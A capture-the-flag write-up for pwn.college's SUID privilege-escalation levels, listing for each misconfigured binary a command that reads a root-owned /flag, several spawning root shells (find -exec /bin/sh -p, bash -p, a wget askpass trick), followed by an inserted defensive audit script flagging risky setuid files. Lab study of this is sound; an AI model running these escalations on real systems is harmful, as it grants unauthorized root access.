How to Read Sensitive Files When the SUID Bit Is Set on Common Commands, and How to Escalate Privilege
Introduction to Pwn College
pwn.college is an online platform that offers training modules for cybersecurity professionals. It helps students and others learn about and practice core cybersecurity concepts.
Pwn.college is an education platform for students (and other interested parties) to learn about, and practice, core cybersecurity concepts in a hands-on fashion. In martial arts terms, it is designed to take a “white belt” in cybersecurity to becoming a “blue belt”, able to approach (simple) CTFs and wargames. Our philosophy is “practice makes perfect”.
The platform is maintained by an awesome team of hackers at Arizona State University. It powers much of ASU’s cybersecurity curriculum, and is open, for free, to participation for interested people around the world!
Program Misuse: Privilege Escalation
Level 1: If SUID bit on /usr/bin/cat
The ‘cat’ command is commonly used to display the contents of a file. In this scenario, the SUID bit is set on ‘cat’, which lets us read the /flag file even though it is owned by root.
cat /flag
Level 2: If SUID bit on /usr/bin/more
The ‘more’ command is used to view the contents of a file page by page. Here, we read the /flag file, a file owned by root, by leveraging the SUID bit set on ‘more’.
more /flag
Level 3: If SUID bit on /usr/bin/less
Similar to ‘more,’ ‘less’ is a command-line pager for viewing files interactively. Here, we aim to read the /flag file using ‘less’ with the SUID bit set, dealing with a file owned by root.
less /flag
Level 4: If SUID bit on /usr/bin/head
The ‘head’ command displays the first lines of a file. Here, we read the /flag file, owned by root, using ‘head’ with the SUID bit set.
head /flag
Level 5: If SUID bit on /usr/bin/tail
The ‘tail’ command displays the last few lines of a file. Here it is used to read the contents of the /flag file; the SUID bit set on ‘tail’ grants access to a file owned by root.
tail /flag
Level 6: If SUID bit on /usr/bin/sort
Sorting the lines of a file is a common task with the ‘sort’ command. Attempting to read the /flag file, we utilize the SUID bit set for ‘sort’ while dealing with a file owned by root.
sort /flag
Level 7: If SUID bit on /usr/bin/vim
The ‘vim’ text editor is invoked to open and edit files. In this case, we open the /flag file using ‘vim’ with the SUID bit set, aiming to access a file owned by root.
vim /flag
Level 8: If SUID bit on /usr/bin/emacs
As a powerful text editor, ‘emacs’ is used to open and modify files. We read the /flag file, owned by root, using ‘emacs’ with the SUID bit set.
emacs /flag
Level 9: If SUID bit on /usr/bin/nano
Offering a user-friendly text editor, ‘nano’ is utilized to open and edit files. In this instance, we attempt to read the /flag file using ‘nano’ with the SUID bit set, interacting with a file owned by root.
nano /flag
Level 10: If SUID bit on /usr/bin/rev
Reversing the content of a file is done with the ‘rev’ command. Here, we reverse the /flag file’s content twice (so the original text comes back out) using ‘rev’ with the SUID bit set, interacting with a file owned by root.
rev /flag | rev
Level 11: If SUID bit on /usr/bin/od
The ‘od’ command displays an octal dump of a file. To read the /flag file, we use ‘od’ with the SUID bit set, interacting with a file owned by root.
od /flag
Level 12: If SUID bit on /usr/bin/hd
For a hexadecimal dump of a file, the ‘hd’ command is employed. Here, we read the /flag file using ‘hd’ with the SUID bit set, dealing with a file owned by root.
hd /flag
Level 13: If SUID bit on /usr/bin/xxd
Generating a hexadecimal dump with line annotations, ‘xxd’ is used here to read the /flag file. The SUID bit is set for ‘xxd,’ allowing access to a file owned by root.
xxd /flag
Level 14: If SUID bit on /usr/bin/base32
Base32 encoding and decoding is performed with the ‘base32’ command. Here, we encode the /flag file and decode the result again to read its contents.
base32 /flag | base32 -d
Level 15: If SUID bit on /usr/bin/base64
Base64 encoding and decoding is performed with the ‘base64’ command. Here, we encode the /flag file and decode the result again to read its contents.
base64 /flag | base64 -d
Level 16: If SUID bit on /usr/bin/split
The ‘split’ command splits a file into pieces. We split /flag into a new file in the current directory and then view that file with the ‘cat’ command.
split /flag
ls
cat FILENAME_THAT_IS_GENERATED
Level 17: If SUID bit on /usr/bin/gzip
‘gzip’ is a tool to compress and decompress files. Here, we compress the flag and decompress the same to view the contents.
gzip -c /flag | gzip -d
Level 18: If SUID bit on /usr/bin/bzip2
‘bzip2’ is a tool to compress and decompress files. Here, we compress the flag and decompress it again to view the contents.
bzip2 -c /flag | bzip2 -d
Level 19: If SUID bit on /usr/bin/zip
Creating a zip archive of a file is achieved with the ‘zip’ command. Attempting to create a zip archive of the /flag file, we use ‘zip’ with the SUID bit set, accessing a file owned by root.
zip flag.zip /flag && cat flag.zip
Level 20: If SUID bit on /usr/bin/tar
The ‘tar’ command is used to create and manipulate tar archives. Here, we attempt to create a tar archive of the /flag file using ‘tar’ with the SUID bit set, dealing with a file owned by root.
tar -cf flag.tar /flag && cat flag.tar
Level 21: If SUID bit on /usr/bin/ar
Creating and managing ar archives is done with this command. We try to create an ar archive of the /flag file, utilizing the SUID bit set for ‘ar’ and accessing a file owned by root.
F=$(mktemp -u) && ar r "$F" /flag && cat "$F"
Level 22: If SUID bit on /usr/bin/cpio
The ‘find’ command locates files, and ‘cpio’ is used for archive creation. We attempt to create a cpio archive of the /flag file using ‘find’ and ‘cpio’ with the SUID bit set, dealing with a file owned by root.
find /flag | cpio -o > flag.cpio && cat flag.cpio
Level 23: If SUID bit on /usr/bin/genisoimage
For creating ISO images, the ‘genisoimage’ command is used. In this case, we attempt to create an ISO image from the /flag file using ‘genisoimage’ with the SUID bit set, interacting with a file owned by root.
genisoimage -sort /flag
Level 24: If SUID bit on /usr/bin/env
The ‘env’ command sets the environment for a command. Here, we use ‘env’ to execute ‘cat’ and display the contents of the /flag file with the SUID bit set, accessing a file owned by root.
env cat /flag
Level 25: If SUID bit on /usr/bin/find
The ‘find’ command is employed with the ‘exec’ option to execute commands on found files. We attempt to execute a shell with root privileges and display the /flag file after gaining root access.
find . -exec /bin/sh -p \;
cat /flag
Level 26: If SUID bit on /usr/bin/make
The ‘make’ command builds and maintains programs. In this case, we use ‘make’ to execute ‘cat’ and display the contents of the /flag file with the SUID bit set, dealing with a file owned by root
make -s --eval=$'x:\n\t-'"cat /flag"
Level 27: If SUID bit on /usr/bin/nice
The ‘nice’ command alters the scheduling priority of a command. Trying to execute ‘cat’ with an increased priority, we aim to display the /flag file with the SUID bit set, accessing a file owned by root.
nice cat /flag
Level 28: If SUID bit on /usr/bin/timeout
The ‘timeout’ command sets a time limit on the execution of a command. Here, we use ‘timeout’ to limit the execution of ‘cat’ and display the contents of the /flag file with the SUID bit set, dealing with a file owned by root
timeout 1 cat /flag
Level 29: If SUID bit on /usr/bin/stdbuf
The ‘stdbuf’ command adjusts buffering options for a command. In this instance, we use ‘stdbuf’ to run ‘cat’ with unbuffered input, attempting to display the contents of the /flag file with the SUID bit set, and accessing a file owned by root.
stdbuf -i0 cat /flag
Level 30: If SUID bit on /usr/bin/setarch
The ‘setarch’ command sets the architecture for a command. Trying to display the contents of the /flag file, we use ‘setarch’ to execute ‘cat’ with the SUID bit set, interacting with a file owned by root
setarch $(arch) cat /flag
Level 31: If SUID bit on /usr/bin/watch
The ‘watch’ command repeats a command at specified intervals. Here, we use ‘watch’ to repeatedly execute ‘cat’ and display the contents of the /flag file with the SUID bit set, dealing with a file owned by root.
watch -x cat /flag
Level 32: If SUID bit on /usr/bin/socat
Socat is a versatile relay tool. Attempting to transfer and display the contents of the /flag file, we use ‘socat’ with the SUID bit set, dealing with a file owned by root.
socat -u /flag -
Level 33: If SUID bit on /usr/bin/whiptail
Whiptail is a dialog box-driven interface. Here, we use ‘whiptail’ to display the contents of the /flag file in a dialog box with specified dimensions, dealing with a file owned by root
whiptail --textbox /flag 10 30
Level 34: If SUID bit on /usr/bin/awk
The ‘awk’ command is used for pattern scanning and processing. In this scenario, we try to use ‘awk’ to display the contents of the /flag file.
awk '//' /flag
Level 35: If SUID bit on /usr/bin/sed
The ‘sed’ command is a stream editor. Here, we attempt to use ‘sed’ to display the contents of the /flag file
sed '' /flag
Level 36: If SUID bit on /usr/bin/ed
The ‘ed’ editor is employed for line-oriented text editing. Here, we use ‘ed’ to print the contents of the /flag file.
ed /flag
# Then type p to print the flag and q to quit
Level 37: If SUID bit on /usr/bin/chown
The ‘chown’ command changes file ownership. Here, we attempt to change the ownership of the /flag file to ‘hacker’ and then display its contents.
chown hacker /flag && cat /flag
Level 38: If SUID bit on /usr/bin/chmod
The ‘chmod’ command modifies file permissions. In this instance, we attempt to change the permissions of the /flag file to allow read and write access for all users, and then display its contents.
chmod 666 /flag && cat /flag
Level 39: If SUID bit on /usr/bin/cp
Copying the /flag file to the current directory is done with the ‘cp’ command. We copy the /flag file without preserving its ownership and permissions, so the copy is readable by us.
cp --no-preserve=all /flag . && cat flag
Level 40: If SUID bit on /usr/bin/mv
The ‘mv’ command is used to move (rename) files. Here we move the ‘cat’ binary over the ‘mv’ tool, so that running ‘mv’ now displays the contents of a file just like ‘cat’.
Then we run /challenge/babysuid_level40 to set the SUID bit on ‘mv’, after which we can read the contents of the /flag file.
mv /usr/bin/cat /usr/bin/mv && /challenge/babysuid_level40 && mv /flag | grep pwn.college{
Level 41: If SUID bit on /usr/bin/perl
The ‘perl’ command is used for text processing. Here, we attempt to use ‘perl’ to display the contents of the /flag file.
perl -pe 'END { close ARGV }' /flag
Level 42: If SUID bit on /usr/bin/python
We are trying to run /flag file with python, which throws an error that contains the flag string.
You can also try to write a program that reads the content of the /flag file.
python /flag
Level 43: If SUID bit on /usr/bin/ruby
Here, a Ruby script that displays the contents of the /flag file is created with ‘echo’ and then run with ‘ruby’.
echo "puts File.read('/flag')" >> a.rb && ruby a.rb
Level 44: If SUID bit on /usr/bin/bash
Executing bash in privileged mode is attempted here. After that, we use ‘cat’ to display the contents of the /flag file.
bash -p
cat /flag
Level 45: If SUID bit on /usr/bin/date
The ‘date’ command is typically used for displaying or setting the system date and time. Here, we use ‘date’ to display the contents of the /flag file. The -f option expects a file of date strings; if we give it a file that does not contain dates, it throws an error that includes the contents of the file.
date -f /flag
Level 46: If SUID bit on /usr/bin/dmesg
The ‘dmesg’ command displays kernel messages. Here, we attempt to use ‘dmesg’ to display the contents of the /flag file.
dmesg -F /flag
Level 47: If SUID bit on /usr/bin/wc
The ‘wc’ command is used for word counting. Here, we pass the /flag file to ‘wc’ as a null-terminated list of file names to count.
wc --files0-from=/flag
Level 48: If SUID bit on /usr/bin/gcc
The ‘gcc’ command is a compiler for programming languages. In this scenario, we attempt to preprocess the /flag file using ‘gcc’ with specific flags.
gcc -x c -E /flag
Level 49: If SUID bit on /usr/bin/as
The ‘as’ command is an assembler for programming languages. Here, we try to use ‘as’ to assemble the /flag file to display its contents
as /flag
Level 50: If SUID bit on /usr/bin/wget
This command creates a temporary executable script file using mktemp, sets execute permissions, and writes a simple shell script into it. The script is designed to execute /bin/sh with a specific set of options. Finally, it uses wget to download a file, passing the created script as the askpass program, allowing for potential privilege escalation or unauthorized access.
Then we can read the /flag file using cat /flag.
F=$(mktemp) && chmod +x "$F" && echo -e '#!/bin/sh -p\n/bin/sh -p 1>&0' >"$F" && wget --use-askpass="$F" 0
cat /flag
Level 51: If SUID bit on /usr/bin/ssh-agent
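As a defender's counterpart to the levels above, here is an added POSIX shell audit helper (not part of the pwn.college write-up or platform): it lists setuid files on a host and flags any whose name is one of the programs this write-up shows reading /flag or spawning a shell when SUID. The sample path list is constructed for an offline run; RISKY_BINS is simply the set of binaries named in the level headings.

```shell
#!/bin/sh
# Added audit helper, not part of the pwn.college write-up: find setuid files
# and flag any whose basename matches a program this write-up shows being
# abused (file read or shell) when the SUID bit is set on it.

# Basenames taken from the level headings above (ssh-agent included from the
# last heading even though the write-up gives no command for it).
RISKY_BINS="cat more less head tail sort vim emacs nano rev od hd xxd base32
base64 split gzip bzip2 zip tar ar cpio genisoimage env find make nice timeout
stdbuf setarch watch socat whiptail awk sed ed chown chmod cp mv perl python
ruby bash date dmesg wc gcc as wget ssh-agent"

# is_risky NAME: exit status 0 if NAME is one of RISKY_BINS.
is_risky() {
    for b in $RISKY_BINS; do
        [ "$b" = "$1" ] && return 0
    done
    return 1
}

# audit_suid_list: reads absolute paths (one per line) from stdin and prints
# those whose basename is in RISKY_BINS. Pipe find_suid into it on a real host.
audit_suid_list() {
    while IFS= read -r path; do
        [ -n "$path" ] || continue
        if is_risky "${path##*/}"; then
            printf '%s\n' "$path"
        fi
    done
}

# find_suid [ROOT]: list regular files with the setuid bit under ROOT
# (default /), staying on one filesystem; permission errors are ignored.
find_suid() {
    find "${1:-/}" -xdev -type f -perm -4000 -print 2>/dev/null
}

# Constructed sample standing in for real find_suid output: passwd, sudo and
# mount are expected setuid programs; cat and find are not and get flagged.
SAMPLE_SUID='/usr/bin/passwd
/usr/bin/sudo
/usr/bin/cat
/usr/bin/find
/usr/bin/mount'

# sample_flagged: the risky entries in SAMPLE_SUID, one per line.
sample_flagged() {
    printf '%s\n' "$SAMPLE_SUID" | audit_suid_list
}
```

On a live host run `find_suid / | audit_suid_list`; any output is a binary that, per the levels above, should not carry the setuid bit.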
Thank you for Reading!!
Happy Hunting ~
Author: Karthikeyan Nagaraj ~ Cyberw1ng